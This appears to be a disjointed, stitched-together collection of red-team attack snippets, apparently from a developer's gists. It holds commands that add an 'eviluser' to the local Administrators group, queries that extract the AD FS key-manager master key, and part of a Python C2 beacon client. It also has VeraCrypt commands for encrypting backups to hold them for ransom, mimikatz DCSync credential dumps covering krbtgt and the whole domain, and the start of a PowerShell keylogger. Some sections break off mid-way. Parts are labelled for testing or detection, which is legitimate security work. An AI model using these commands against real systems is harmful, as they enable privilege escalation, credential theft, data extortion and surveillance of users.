Toussaint Louverture justaguywhocodes
https://drive.usercontent.google.com/download?id=1-c0mDrGPd85ch9MONa3W4w69GZlHNj9Y&export=download&authuser=0
https://drive.usercontent.google.com/download?id=1Yop_c1oOFQv-fn8cmqc_XzP8bEbn2IYr&export=download&authuser=0
https://drive.usercontent.google.com/download?id=1bHVGsTe94U5BttsF_ME8hqd5tssoR-2J&export=download&authuser=0
Commands to Execute (from a standard user or attacker context)
Option 1 (cmd): Using net localgroup (most common, loudest, almost always detected by modern EDR)
net localgroup Administrators eviluser /add
Option 2 (cmd): Using net.exe with a domain account (if testing domain user to local admin)
net localgroup Administrators "DOMAIN\eviluser" /add
Option 3 (powershell): Using PowerShell Add-LocalGroupMember (very common in modern attacks)
https://github.com/C-Sto/gosecretsdump/releases
Enable-WindowsOptionalFeature -Online -FeatureName IIS-WebServerRole, IIS-WebServer, IIS-CommonHttpFeatures, IIS-HttpErrors, IIS-HttpRedirect, IIS-ApplicationDevelopment, IIS-NetFxExtensibility45, IIS-HealthAndDiagnostics, IIS-HttpLogging, IIS-LoggingLibraries, IIS-RequestMonitor, IIS-HttpTracing, IIS-Security, IIS-RequestFiltering, IIS-HttpCompressionDynamic, IIS-WebServerManagementTools, IIS-ManagementConsole, IIS-StaticContent, IIS-DefaultDocument, IIS-DirectoryBrowsing, IIS-WebSockets, IIS-ApplicationInit -All
Commands to test/demonstrate this TTP (testing/red-team purposes only)
1. Using PowerShell (AD module) – Recommended for testing (powershell)
# Find the AD FS DKM container (one of the two possible locations)
Get-ADObject -Filter { (Name -eq "ADFSSRV") -or (Name -eq "Distributed Key Manager") } -SearchBase "CN=Configuration,DC=contoso,DC=com" -Properties *
# Directly retrieve the DKM master key (new format via KeyCredentialLink)
$dkm = Get-ADObject "CN=ADFSSRV,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=contoso,DC=com" -Properties msDS-KeyCredentialLink
$dkm.msDS-KeyCredentialLink
# Alternative location in newer AD FS versions
justaguywhocodes / client.py
Last active November 21, 2025 15:25
rc4 encryption
import socket
import time
import random
import string
from arc4 import ARC4
# Configuration
C2_SERVER = ('172.31.255.29', 443) # Change to your lab C2 IP
KEY = b'APT38SecretKey2025!'
BEACON_INTERVAL = 30 # seconds between beacons (average)
Commands commonly observed in the wild for this TTP (for testing/detection purposes only)
Below are typical commands adversaries use with VeraCrypt to encrypt on-premises backups. These are provided strictly for blue-team detection rule creation, lab testing, or red-team emulation in authorized environments.
1. Download VeraCrypt (portable version preferred by attackers) (powershell)
Invoke-WebRequest -Uri "https://launchpad.net/veracrypt/trunk/1.26.7/+download/VeraCrypt_Portable_1.26.7.exe" -OutFile "C:\Temp\VeraCrypt.exe"
2. Create an encrypted container from an existing backup file (most common method) (cmd)
VeraCrypt.exe /volume "E:\Backups\backup.vhdx" /letter X /password SuperSecret123! /hash sha512 /encryption aes /filesystem NTFS /size 100% /force /quit
or silently (cmd):
# Elevate privileges
privilege::debug
token::elevate
# Full domain dump (all hashes)
lsadump::dcsync /domain:corp.local /all /csv
# Specific high-value accounts only
lsadump::dcsync /domain:corp.local /user:krbtgt
lsadump::dcsync /domain:corp.local /user:administrator
Add-Type @'
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("user32.dll")]
public static extern short GetAsyncKeyState(int vKey);
}
'@
$logFile = "$env:TEMP\keylog.txt"